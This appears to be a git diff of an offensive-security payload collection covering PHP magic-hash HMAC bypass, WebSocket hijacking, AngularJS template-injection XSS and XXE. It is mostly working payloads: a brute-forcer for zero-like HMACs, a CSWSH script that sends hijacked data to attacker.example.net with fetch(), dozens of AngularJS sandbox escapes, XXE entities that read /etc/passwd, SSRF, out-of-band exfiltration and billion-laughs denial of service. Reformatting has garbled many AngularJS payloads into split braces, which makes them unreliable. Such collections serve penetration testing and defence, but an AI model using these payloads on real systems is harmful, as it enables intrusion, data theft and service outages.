In this case, if an attacker can control the $cookie['hmac'] value and set it to a string like "0", and somehow manipulate the hash_hmac function to return a hash that starts with "0e" followed only by numbers (which is interpreted as zero), the condition $cookie['hmac'] != $hash would evaluate to false, effectively bypassing the HMAC check.
We have control over 3 elements in the cookie:
- `$username` - username you are targeting, probably "admin"
- `$expiration` - a UNIX timestamp, must be in the future
- `$hmac` - the provided hash, "0"
The exploitation phase is the following:
1. Prepare a malicious cookie: The attacker prepares a cookie with $username set to the user they wish to impersonate (for example, "admin"), `$expiration` set to a future UNIX timestamp, and $hmac set to "0".
2. Brute force the `$expiration` value: The attacker then brute forces different `$expiration` values until the hash_hmac function generates a hash that starts with "0e" and is followed only by numbers. This is a computationally intensive process and might not be feasible depending on the system setup. However, if successful, this step would generate a "zero-like" hash.
```php
// docker run -it --rm -v /tmp/test:/usr/src/myapp -w /usr/src/myapp php:8.3.0alpha1-cli-buster php exp.php
for($i=1424869663; $i < 1835970773; $i++ ){
$out = hash_hmac('md5', 'admin|'.$i, '');
if(str_starts_with($out, '0e' )){
if($out == 0){
echo "$i - ".$out;
break;
}
}
}
?>
```
```php
// docker run -it --rm -v /tmp/test:/usr/src/myapp -w /usr/src/myapp php:8.3.0alpha1-cli-buster php exp.php
for($i=1424869663; $i < 1835970773; $i++ ){
$out = hash_hmac('md5', 'admin|'.$i, '');
if(str_starts_with($out, '0e' )){
if($out == 0){
echo "$i - ".$out;
break;
}
}
}
?>
```
3. Update the cookie data with the value from the bruteforce: `1539805986 - 0e772967136366835494939987377058`
```php
$cookie = [
'username' => 'admin',
'expiration' => 1539805986,
'hmac' => '0'
];
```
```php
$cookie = [
'username' => 'admin',
'expiration' => 1539805986,
'hmac' => '0'
];
```
4. In this case we assumed the key was a null string : `$key = '';`
## References
* [Writing Exploits For Exotic Bug Classes: PHP Type Juggling By Tyler Borland](http://turbochaos.blogspot.com/2013/08/exploiting-exotic-bugs-php-type-juggling.html)
* [Magic Hashes - WhiteHatSec](https://www.whitehatsec.com/blog/magic-hashes/)
* [PHP Magic Tricks: Type Juggling](https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf)
* [spaze/hashes - Magic hashes PHP hash "collisions"](https://github.com/spaze/hashes)
* [(Super) Magic Hashes - Mon 07 October 2019 - myst404 (@myst404_)](https://offsec.almond.consulting/super-magic-hash.html)
- [Writing Exploits For Exotic Bug Classes: PHP Type Juggling By Tyler Borland](http://turbochaos.blogspot.com/2013/08/exploiting-exotic-bugs-php-type-juggling.html)
- [Magic Hashes - WhiteHatSec](https://www.whitehatsec.com/blog/magic-hashes/)
- [PHP Magic Tricks: Type Juggling](https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf)
- [spaze/hashes - Magic hashes PHP hash "collisions"](https://github.com/spaze/hashes)
- [(Super) Magic Hashes - Mon 07 October 2019 - myst404 (@myst404\_)](https://offsec.almond.consulting/super-magic-hash.html)

38
Web Sockets/README.md
View File

@ -4,18 +4,18 @@
## Summary
* [Tools](#tools)
* [Exploit](#exploit)
* [Using wsrepl](#using-wsrepl)
* [Using ws-harness.py](#using-ws-harness-py)
* [Cross-Site WebSocket Hijacking (CSWSH)](#cross-site-websocket-hijacking-cswsh)
* [Labs](#labs)
* [References](#references)
- [Tools](#tools)
- [Exploit](#exploit)
- [Using wsrepl](#using-wsrepl)
- [Using ws-harness.py](#using-ws-harness-py)
- [Cross-Site WebSocket Hijacking (CSWSH)](#cross-site-websocket-hijacking-cswsh)
- [Labs](#labs)
- [References](#references)
## Tools
* [doyensec/wsrepl](https://github.com/doyensec/wsrepl) - WebSocket REPL for pentesters
* [mfowl/ws-harness.py](https://gist.githubusercontent.com/mfowl/ae5bc17f986d4fcc2023738127b06138/raw/e8e82467ade45998d46cef355fd9b57182c3e269/ws.harness.py)
- [doyensec/wsrepl](https://github.com/doyensec/wsrepl) - WebSocket REPL for pentesters
- [mfowl/ws-harness.py](https://gist.githubusercontent.com/mfowl/ae5bc17f986d4fcc2023738127b06138/raw/e8e82467ade45998d46cef355fd9b57182c3e269/ws.harness.py)
## Exploit
@ -70,7 +70,6 @@ class Demo(Plugin):
message.long = original
```
### Using ws-harness.py
Start `ws-harness` to listen on a web-socket, and specify a message template to send to the endpoint.
@ -82,7 +81,7 @@ python ws-harness.py -u "ws://dvws.local:8080/authenticate-user" -m ./message.tx
The content of the message should contains the **[FUZZ]** keyword.
```json
{"auth_user":"dGVzda==", "auth_pass":"[FUZZ]"}
{ "auth_user": "dGVzda==", "auth_pass": "[FUZZ]" }
```
Then you can use any tools against the newly created web service, working as a proxy and tampering on the fly the content of message sent thru the websocket.
@ -91,7 +90,6 @@ Then you can use any tools against the newly created web service, working as a p
sqlmap -u http://127.0.0.1:8000/?fuzz=test --tables --tamper=base64encode --dump
```
## Cross-Site WebSocket Hijacking (CSWSH)
If the WebSocket handshake is not correctly protected using a CSRF token or a
@ -104,13 +102,13 @@ data from the WebSocket to the attacker:
```html
<script>
ws = new WebSocket('wss://vulnerable.example.com/messages');
ws = new WebSocket("wss://vulnerable.example.com/messages");
ws.onopen = function start(event) {
ws.send("HELLO");
}
};
ws.onmessage = function handleReply(event) {
fetch('https://attacker.example.net/?'+event.data, {mode: 'no-cors'});
}
fetch("https://attacker.example.net/?" + event.data, { mode: "no-cors" });
};
ws.send("Some text sent to the server");
</script>
```
@ -120,16 +118,14 @@ application uses a `Sec-WebSocket-Protocol` header in the handshake request,
you have to add this value as a 2nd parameter to the `WebSocket` function call
in order to add this header.
## Labs
* [PortSwigger Labs for Web Sockets](https://portswigger.net/web-security/all-labs#http-request-smuggling)
- [PortSwigger Labs for Web Sockets](https://portswigger.net/web-security/all-labs#http-request-smuggling)
## References
- [HACKING WEB SOCKETS: ALL WEB PENTEST TOOLS WELCOMED by Michael Fowl | Mar 5, 2019](https://web.archive.org/web/20190306170840/https://www.vdalabs.com/2019/03/05/hacking-web-sockets-all-web-pentest-tools-welcomed/)
- [Hacking with WebSockets - Qualys - Mike Schema, Sergey Shekyan, Vaagn Toukharian](https://media.blackhat.com/bh-us-12/Briefings/Shekyan/BH_US_12_Shekyan_Toukharian_Hacking_Websocket_Slides.pdf)
- [Hacking with WebSockets - Qualys - Mike Shema, Sergey Shekyan, Vaagn Toukharian](https://media.blackhat.com/bh-us-12/Briefings/Shekyan/BH_US_12_Shekyan_Toukharian_Hacking_Websocket_Slides.pdf)
- [Mini WebSocket CTF - January 27, 2020 - Snowscan](https://snowscan.io/bbsctf-evilconneck/#)
- [Hacktricks - CSWSH](https://book.hacktricks.xyz/pentesting-web/cross-site-websocket-hijacking-cswsh)
- [Streamlining Websocket Pentesting with wsrepl - Andrez Konstantinov - 18 Jul 2023](https://blog.doyensec.com/2023/07/18/streamlining-websocket-pentesting-with-wsrepl.html)
- [Streamlining Websocket Pentesting with wsrepl - Andrez Konstantinov - 18 Jul 2023](https://blog.doyensec.com/2023/07/18/streamlining-websocket-pentesting-with-wsrepl.html)

2
XSS Injection/Intruders/jsonp_endpoint.txt
View File

@ -1,5 +1,5 @@
#Google.com:
"><script+src="https://googleads.g.double-click.net/pagead/conversion/1036918760/wcm?callback=alert(1337)"></script>
"><script+src="https://googleads.g.doubleclick.net/pagead/conversion/1036918760/wcm?callback=alert(1337)"></script>
"><script+src="https://www.googleadservices.com/pagead/conversion/1070110417/wcm?callback=alert(1337)"></script>
"><script+src="https://cse.google.com/api/007627024705277327428/cse/r3vs7b0fcli/queries/js?callback=alert(1337)"></script>
"><script+src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)"></script>

380
XSS Injection/XSS in Angular.md
View File

@ -13,7 +13,11 @@ The following payloads are based on Client Side Template Injection.
AngularJS 1.6+ by [Mario Heiderich](https://twitter.com/cure53berlin)
```javascript
{{constructor.constructor('alert(1)')()}}
{
{
constructor.constructor("alert(1)")();
}
}
```
AngularJS 1.6+ by [@brutelogic](https://twitter.com/brutelogic/status/1031534746084491265)
@ -27,9 +31,21 @@ Example available at [https://brutelogic.com.br/xss.php](https://brutelogic.com.
AngularJS 1.6.0 by [@LewisArdern](https://twitter.com/LewisArdern/status/1055887619618471938) & [@garethheyes](https://twitter.com/garethheyes/status/1055884215131213830)
```javascript
{{0[a='constructor'][a]('alert(1)')()}}
{{$eval.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}
{
{
(0)[(a = "constructor")][a]("alert(1)")();
}
}
{
{
$eval.constructor("alert(1)")();
}
}
{
{
$on.constructor("alert(1)")();
}
}
```
AngularJS 1.5.9 - 1.5.11 by [Jan Horn](https://twitter.com/tehjh)
@ -54,101 +70,176 @@ AngularJS 1.5.9 - 1.5.11 by [Jan Horn](https://twitter.com/tehjh)
AngularJS 1.5.0 - 1.5.8
```javascript
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
{
{
x = { y: "".constructor.prototype };
x["y"].charAt = [].join;
$eval("x=alert(1)");
}
}
```
AngularJS 1.4.0 - 1.4.9
```javascript
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
{
{
"a".constructor.prototype.charAt = [].join;
$eval("x=1} } };alert(1)//");
}
}
```
AngularJS 1.3.20
```javascript
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
{
{
"a".constructor.prototype.charAt = [].join;
$eval("x=alert(1)");
}
}
```
AngularJS 1.3.19
```javascript
{{
'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;
$eval('x=alert(1)//');
}}
{
{
"a"[
{ toString: false, valueOf: [].join, length: 1, 0: "__proto__" }
].charAt = [].join;
$eval("x=alert(1)//");
}
}
```
AngularJS 1.3.3 - 1.3.18
```javascript
{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
'a'.constructor.prototype.charAt=[].join;
$eval('x=alert(1)//'); }}
{
{
{
}
[{ toString: [].join, length: 1, 0: "__proto__" }].assign = [].join;
"a".constructor.prototype.charAt = [].join;
$eval("x=alert(1)//");
}
}
```
AngularJS 1.3.1 - 1.3.2
```javascript
{{
{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
'a'.constructor.prototype.charAt=''.valueOf;
$eval('x=alert(1)//');
}}
{
{
{
}
[{ toString: [].join, length: 1, 0: "__proto__" }].assign = [].join;
"a".constructor.prototype.charAt = "".valueOf;
$eval("x=alert(1)//");
}
}
```
AngularJS 1.3.0
```javascript
{{!ready && (ready = true) && (
!call
? $$watchers[0].get(toString.constructor.prototype)
: (a = apply) &&
(apply = constructor) &&
(valueOf = call) &&
(''+''.toString(
'F = Function.prototype;' +
'F.apply = F.a;' +
'delete F.a;' +
'delete F.valueOf;' +
'alert(1);'
))
);}}
{
{
!ready &&
(ready = true) &&
(!call
? $$watchers[0].get(toString.constructor.prototype)
: (a = apply) &&
(apply = constructor) &&
(valueOf = call) &&
"" +
"".toString(
"F = Function.prototype;" +
"F.apply = F.a;" +
"delete F.a;" +
"delete F.valueOf;" +
"alert(1);"
));
}
}
```
AngularJS 1.2.24 - 1.2.29
```javascript
{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
{
{
"a".constructor.prototype.charAt = "".valueOf;
$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");
}
}
```
AngularJS 1.2.19 - 1.2.23
```javascript
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
{
{
toString.constructor.prototype.toString =
toString.constructor.prototype.call;
["a", "alert(1)"].sort(toString.constructor);
}
}
```
AngularJS 1.2.6 - 1.2.18
```javascript
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
{
{
(_ = "".sub).call.call(
{}[($ = "constructor")].getOwnPropertyDescriptor(_.__proto__, $).value,
0,
"alert(1)"
)();
}
}
```
AngularJS 1.2.2 - 1.2.5
```javascript
{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}
{
{
"a"[{ toString: [].join, length: 1, 0: "__proto__" }].charAt = "".valueOf;
$eval(
"x='" + (y = "if(!window\\u002ex)alert(window\\u002ex=1)") + eval(y) + "'"
);
}
}
```
AngularJS 1.2.0 - 1.2.1
```javascript
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
{
{
a = "constructor";
b = {};
a.sub.call.call(
b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub), a).value,
0,
"alert(1)"
)();
}
}
```
AngularJS 1.0.1 - 1.1.5 and Vue JS
```javascript
{{constructor.constructor('alert(1)')()}}
{
{
constructor.constructor("alert(1)")();
}
}
```
### Advanced bypassing XSS
@ -156,31 +247,189 @@ AngularJS 1.0.1 - 1.1.5 and Vue JS
AngularJS (without `'` single and `"` double quotes) by [@Viren](https://twitter.com/VirenPawar_)
```javascript
{{x=valueOf.name.constructor.fromCharCode;constructor.constructor(x(97,108,101,114,116,40,49,41))()}}
{
{
x = valueOf.name.constructor.fromCharCode;
constructor.constructor(x(97, 108, 101, 114, 116, 40, 49, 41))();
}
}
```
AngularJS (without `'` single and `"` double quotes and `constructor` string)
```javascript
{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,toString()[a].fromCharCode(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}}
{
{
x = 767015343;
y = 50986827;
a = x.toString(36) + y.toString(36);
b = {};
a.sub.call.call(
b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub), a).value,
0,
toString()[a].fromCharCode(
112,
114,
111,
109,
112,
116,
40,
100,
111,
99,
117,
109,
101,
110,
116,
46,
100,
111,
109,
97,
105,
110,
41
)
)();
}
}
```
```javascript
{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,toString()[a].fromCodePoint(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}}
{
{
x = 767015343;
y = 50986827;
a = x.toString(36) + y.toString(36);
b = {};
a.sub.call.call(
b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub), a).value,
0,
toString()[a].fromCodePoint(
112,
114,
111,
109,
112,
116,
40,
100,
111,
99,
117,
109,
101,
110,
116,
46,
100,
111,
109,
97,
105,
110,
41
)
)();
}
}
```
```javascript
{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);a.sub.call.call({}[a].getOwnPropertyDescriptor(a.sub.__proto__,a).value,0,toString()[a].fromCharCode(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}}
{
{
x = 767015343;
y = 50986827;
a = x.toString(36) + y.toString(36);
a.sub.call.call(
{}[a].getOwnPropertyDescriptor(a.sub.__proto__, a).value,
0,
toString()[a].fromCharCode(
112,
114,
111,
109,
112,
116,
40,
100,
111,
99,
117,
109,
101,
110,
116,
46,
100,
111,
109,
97,
105,
110,
41
)
)();
}
}
```
```javascript
{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);a.sub.call.call({}[a].getOwnPropertyDescriptor(a.sub.__proto__,a).value,0,toString()[a].fromCodePoint(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}}
{
{
x = 767015343;
y = 50986827;
a = x.toString(36) + y.toString(36);
a.sub.call.call(
{}[a].getOwnPropertyDescriptor(a.sub.__proto__, a).value,
0,
toString()[a].fromCodePoint(
112,
114,
111,
109,
112,
116,
40,
100,
111,
99,
117,
109,
101,
110,
116,
46,
100,
111,
109,
97,
105,
110,
41
)
)();
}
}
```
AngularJS bypass Waf [Imperva]
```javascript
{{x=['constr', 'uctor'];a=x.join('');b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'pr\\u{6f}mpt(d\\u{6f}cument.d\\u{6f}main)')()}}
{
{
x = ["constr", "uctor"];
a = x.join("");
b = {};
a.sub.call.call(
b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub), a).value,
0,
"pr\\u{6f}mpt(d\\u{6f}cument.d\\u{6f}main)"
)();
}
}
```
### Blind XSS
@ -195,8 +444,7 @@ AngularJS bypass Waf [Imperva]
}}
```
Shorter 1.0.1 - 1.1.5 && > 1.6.0 by Lewis Ardern (Synopsis) and Gareth Heyes (PortSwigger)
Shorter 1.0.1 - 1.1.5 && > 1.6.0 by Lewis Ardern (Synopsys) and Gareth Heyes (PortSwigger)
```javascript
{{
@ -276,16 +524,32 @@ Shorter 1.0.1 - 1.1.5 && > 1.6.0 by Lewis Ardern (Synopsis) and Gareth Heyes (Po
1.5.9 - 1.5.11 by Jan Horn (Cure53, now works at Google Project Zero)
```javascript
{{
c=''.sub.call;b=''.sub.bind;a=''.sub.apply;c.$apply=$apply;
c.$eval=b;op=$root.$$phase;
$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;
C=c.$apply(c);$root.$$phase=op;$root.$digest=od;
B=C(b,c,b);$evalAsync("astNode=pop();astNode.type='UnaryExpression';astNode.operator='(window.X?void0:(window.X=true,eval(`var _=document.createElement(\\'script\\');_.src=\\'//localhost/m\\';document.body.appendChild(_);`)))+';astNode.argument={type:'Identifier',name:'foo'};");
m1=B($$asyncQueue.pop().expression,null,$root);
m2=B(C,null,m1);[].push.apply=m2;a=''.sub;
$eval('a(b.c)');[].push.apply=a;
}}
{
{
c = "".sub.call;
b = "".sub.bind;
a = "".sub.apply;
c.$apply = $apply;
c.$eval = b;
op = $root.$$phase;
$root.$$phase = null;
od = $root.$digest;
$root.$digest = {}.toString;
C = c.$apply(c);
$root.$$phase = op;
$root.$digest = od;
B = C(b, c, b);
$evalAsync(
"astNode=pop();astNode.type='UnaryExpression';astNode.operator='(window.X?void0:(window.X=true,eval(`var _=document.createElement(\\'script\\');_.src=\\'//localhost/m\\';document.body.appendChild(_);`)))+';astNode.argument={type:'Identifier',name:'foo'};"
);
m1 = B($$asyncQueue.pop().expression, null, $root);
m2 = B(C, null, m1);
[].push.apply = m2;
a = "".sub;
$eval("a(b.c)");
[].push.apply = a;
}
}
```
## Automatic Sanitization
@ -332,4 +596,4 @@ When doing a code review, you want to make sure that no user input is being trus
- [Blind XSS AngularJS Payloads](https://ardern.io/2018/12/07/angularjs-bxss)
- [Angular Security](https://angular.io/guide/security)
- [Bypass DomSanitizer](https://medium.com/@swarnakishore/angular-safe-pipe-implementation-to-bypass-domsanitizer-stripping-out-content-c1bf0f1cc36b)
- [Bidding Like a Billionaire - Stealing NFTs With 4-Char CSTIs - Matan Berson - 2024-07-11](https://matanber.com/blog/4-char-csti)
- [Bidding Like a Billionaire - Stealing NFTs With 4-Char CSTIs - Matan Berson - 2024-07-11](https://matanber.com/blog/4-char-csti)

149
XXE Injection/README.md
View File

@ -2,10 +2,10 @@
> An XML External Entity attack is a type of attack against an application that parses XML input and allows XML entities. XML entities can be used to tell the XML parser to fetch specific content on the server.
**Internal Entity**: If an entity is declared within a DTD it is called as internal entity.
**Internal Entity**: If an entity is declared within a DTD it is called as internal entity.
Syntax: `<!ENTITY entity_name "entity_value">`
**External Entity**: If an entity is declared outside a DTD it is called as external entity. Identified by `SYSTEM`.
**External Entity**: If an entity is declared outside a DTD it is called as external entity. Identified by `SYSTEM`.
Syntax: `<!ENTITY entity_name SYSTEM "entity_value">`
## Summary
@ -24,8 +24,8 @@ Syntax: `<!ENTITY entity_name SYSTEM "entity_value">`
- [Yaml attack](#yaml-attack)
- [Parameters Laugh attack](#parameters-laugh-attack)
- [Exploiting Error Based XXE](#exploiting-error-based-xxe)
- [Error Based - Using Local DTD File](#error-based---using-local-dtd-file)
- [Error Based - Using Remote DTD](#error-based---using-remote-dtd)
- [Error Based - Using Local DTD File](#error-based---using-local-dtd-file)
- [Error Based - Using Remote DTD](#error-based---using-remote-dtd)
- [Exploiting blind XXE to exfiltrate data out-of-band](#exploiting-blind-xxe-to-exfiltrate-data-out-of-band)
- [Blind XXE](#blind-xxe)
- [XXE OOB Attack (Yunusov, 2013)](#xxe-oob-attack-yusonov---2013)
@ -91,23 +91,22 @@ Syntax: `<!ENTITY entity_name SYSTEM "entity_value">`
```
- [otori](http://www.beneaththewaves.net/Software/On_The_Outside_Reaching_In.html) - Toolbox intended to allow useful exploitation of XXE vulnerabilities.
```ps1
python ./otori.py --clone --module "G-XXE-Basic" --singleuri "file:///etc/passwd" --module-options "TEMPLATEFILE" "TARGETURL" "BASE64ENCODE" "DOCTYPE" "XMLTAG" --outputbase "./output-generic-solr" --overwrite --noerrorfiles --noemptyfiles --nowhitespacefiles --noemptydirs
python ./otori.py --clone --module "G-XXE-Basic" --singleuri "file:///etc/passwd" --module-options "TEMPLATEFILE" "TARGETURL" "BASE64ENCODE" "DOCTYPE" "XMLTAG" --outputbase "./output-generic-solr" --overwrite --noerrorfiles --noemptyfiles --nowhitespacefiles --noemptydirs
```
## Labs
* [PortSwigger Labs for XXE](https://portswigger.net/web-security/all-labs#xml-external-entity-xxe-injection)
* [Exploiting XXE using external entities to retrieve files](https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-retrieve-files)
* [Exploiting XXE to perform SSRF attacks](https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-perform-ssrf)
* [Blind XXE with out-of-band interaction](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-interaction)
* [Blind XXE with out-of-band interaction via XML parameter entities](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-interaction-using-parameter-entities)
* [Exploiting blind XXE to exfiltrate data using a malicious external DTD](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-exfiltration)
* [Exploiting blind XXE to retrieve data via error messages](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-data-retrieval-via-error-messages)
* [Exploiting XInclude to retrieve files](https://portswigger.net/web-security/xxe/lab-xinclude-attack)
* [Exploiting XXE via image file upload](https://portswigger.net/web-security/xxe/lab-xxe-via-file-upload)
* [Exploiting XXE to retrieve data by repurposing a local DTD](https://portswigger.net/web-security/xxe/blind/lab-xxe-trigger-error-message-by-repurposing-local-dtd)
* [GoSecure workshop - Advanced XXE Exploitation](https://gosecure.github.io/xxe-workshop)
- [PortSwigger Labs for XXE](https://portswigger.net/web-security/all-labs#xml-external-entity-xxe-injection)
- [Exploiting XXE using external entities to retrieve files](https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-retrieve-files)
- [Exploiting XXE to perform SSRF attacks](https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-perform-ssrf)
- [Blind XXE with out-of-band interaction](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-interaction)
- [Blind XXE with out-of-band interaction via XML parameter entities](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-interaction-using-parameter-entities)
- [Exploiting blind XXE to exfiltrate data using a malicious external DTD](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-exfiltration)
- [Exploiting blind XXE to retrieve data via error messages](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-data-retrieval-via-error-messages)
- [Exploiting XInclude to retrieve files](https://portswigger.net/web-security/xxe/lab-xinclude-attack)
- [Exploiting XXE via image file upload](https://portswigger.net/web-security/xxe/lab-xxe-via-file-upload)
- [Exploiting XXE to retrieve data by repurposing a local DTD](https://portswigger.net/web-security/xxe/blind/lab-xxe-trigger-error-message-by-repurposing-local-dtd)
- [GoSecure workshop - Advanced XXE Exploitation](https://gosecure.github.io/xxe-workshop)
## Detect the vulnerability
@ -128,7 +127,7 @@ It might help to set the `Content-Type: application/xml` in the request when sen
### Classic XXE
We try to display the content of the file `/etc/passwd`
We try to display the content of the file `/etc/passwd`
```xml
<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><root>&test;</root>
@ -145,14 +144,14 @@ We try to display the content of the file `/etc/passwd`
```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
```
```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
```
@ -196,15 +195,13 @@ We try to display the content of the file `/etc/passwd`
### XInclude attacks
When you can't modify the **DOCTYPE** element use the **XInclude** to target
When you can't modify the **DOCTYPE** element use the **XInclude** to target
```xml
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>
```
## Exploiting XXE to perform SSRF attacks
XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery) to target another service on the network.
@ -218,7 +215,6 @@ XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo
<foo>&xxe;</foo>
```
## Exploiting XXE to perform a deny of service
:warning: : These attacks might kill the service or the server, do not use them on the production.
@ -265,7 +261,6 @@ A variant of the Billion Laughs attack, using delayed interpretation of paramete
<r/>
```
## Exploiting Error Based XXE
### Error Based - Using Local DTD File
@ -282,7 +277,8 @@ Short list of dtd files already stored on Linux systems; list them with `locate
The file `/usr/share/xml/fontconfig/fonts.dtd` has an injectable entity `%constant` at line 148: `<!ENTITY % constant 'int|double|string|matrix|bool|charset|langset|const'>`
The final payload becomes:
The final payload becomes:
```xml
<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">
@ -297,7 +293,6 @@ The final payload becomes:
<message>Text</message>
```
### Error Based - Using Remote DTD
**Payload to trigger the XXE**
@ -332,17 +327,13 @@ The final payload becomes:
Let's break down the payload:
1. `<!ENTITY % file SYSTEM "file:///etc/passwd">`
This line defines an external entity named file that references the content of the file /etc/passwd (a Unix-like system file containing user account details).
This line defines an external entity named file that references the content of the file /etc/passwd (a Unix-like system file containing user account details).
2. `<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">`
This line defines an entity eval that holds another entity definition. This other entity (error) is meant to reference a nonexistent file and append the content of the file entity (the `/etc/passwd` content) to the end of the file path. The `&#x25;` is a URL-encoded '`%`' used to reference an entity inside an entity definition.
This line defines an entity eval that holds another entity definition. This other entity (error) is meant to reference a nonexistent file and append the content of the file entity (the `/etc/passwd` content) to the end of the file path. The `&#x25;` is a URL-encoded '`%`' used to reference an entity inside an entity definition.
3. `%eval;`
This line uses the eval entity, which causes the entity error to be defined.
This line uses the eval entity, which causes the entity error to be defined.
4. `%error;`
Finally, this line uses the error entity, which attempts to access a nonexistent file with a path that includes the content of `/etc/passwd`. Since the file doesn't exist, an error will be thrown. If the application reports back the error to the user and includes the file path in the error message, then the content of `/etc/passwd` would be disclosed as part of the error message, revealing sensitive information.
Finally, this line uses the error entity, which attempts to access a nonexistent file with a path that includes the content of `/etc/passwd`. Since the file doesn't exist, an error will be thrown. If the application reports back the error to the user and includes the file path in the error message, then the content of `/etc/passwd` would be disclosed as part of the error message, revealing sensitive information.
## Exploiting blind XXE to exfiltrate data out-of-band
@ -424,10 +415,10 @@ Send the XML file to the `deploy` folder.
Ref. [brianwrf/CVE-2018-11788](https://github.com/brianwrf/CVE-2018-11788)
## XXE with local DTD
In some case, outgoing connections are not possible from the web application. DNS names might even not resolve externally with a payload like this:
```xml
<!DOCTYPE root [<!ENTITY test SYSTEM 'http://h3l9e5soi0090naz81tmq5ztaaaaaa.burpcollaborator.net'>]>
<root>&test;</root>
@ -461,36 +452,41 @@ Assuming payloads such as the previous return a verbose error. You can start poi
]>
<root></root>
```
### Cisco WebEx
```
<!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd">
<!ENTITY % url.attribute.set '>Your DTD code<!ENTITY test "test"'>
%local_dtd;
```
### Citrix XenMobile Server
```
<!ENTITY % local_dtd SYSTEM "jar:file:///opt/sas/sw/tomcat/shared/lib/jsp-api.jar!/javax/servlet/jsp/resources/jspxml.dtd">
<!ENTITY % Body '>Your DTD code<!ENTITY test "test"'>
%local_dtd;
```
[Other payloads using different DTDs](https://github.com/GoSecure/dtd-finder/blob/master/list/xxe_payloads.md)
## WAF Bypasses
## WAF Bypasses
### Bypass via character encoding
XML parsers uses 4 methods to detect encoding:
* HTTP Content Type: `Content-Type: text/xml; charset=utf-8`
* Reading Byte Order Mark (BOM)
* Reading first symbols of document
* UTF-8 (3C 3F 78 6D)
* UTF-16BE (00 3C 00 3F)
* UTF-16LE (3C 00 3F 00)
* XML declaration: `<?xml version="1.0" encoding="UTF-8"?>`
- HTTP Content Type: `Content-Type: text/xml; charset=utf-8`
- Reading Byte Order Mark (BOM)
- Reading first symbols of document
- UTF-8 (3C 3F 78 6D)
- UTF-16BE (00 3C 00 3F)
- UTF-16LE (3C 00 3F 00)
- XML declaration: `<?xml version="1.0" encoding="UTF-8"?>`
| Encoding | BOM | Example | |
|----------|----------|-------------------------------------|--------------|
| -------- | -------- | ----------------------------------- | ------------ |
| UTF-8 | EF BB BF | EF BB BF 3C 3F 78 6D 6C | ...<?xml |
